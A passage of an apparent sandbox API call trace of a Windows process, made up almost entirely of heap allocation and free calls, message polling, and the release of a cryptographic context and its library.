(HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0088.600] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0088.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0088.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0088.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0088.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0088.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0088.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0088.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0088.601] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0088.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0088.601] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0088.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0088.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0088.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0088.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0088.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0088.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0088.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0088.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0088.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0088.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0088.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0088.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0088.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0088.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0088.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0088.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0088.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0088.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0088.603] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0088.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0088.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0088.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0088.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0088.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0088.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0088.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0088.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0088.603] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0088.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0088.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3a0 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0088.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.605] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0088.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0088.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0088.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0088.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0088.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0088.605] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca340 [0088.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0088.605] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0088.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0088.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0088.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.606] FreeLibrary (hLibModule=0x756e0000) returned 1 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0088.606] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0088.606] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.606] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0088.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca280 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca340 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3a0 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0088.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0088.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0088.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0088.607] CloseHandle (hObject=0x258) returned 1 [0088.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0088.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ed3b0 | out: hHeap=0x1780000) returned 1 [0088.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0088.612] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0088.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0088.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0088.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0088.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2b0 [0088.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0088.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca358 [0088.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0088.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0088.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0088.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.613] CloseHandle (hObject=0x298) returned 1 [0088.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0088.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0088.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0088.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0088.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0088.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, 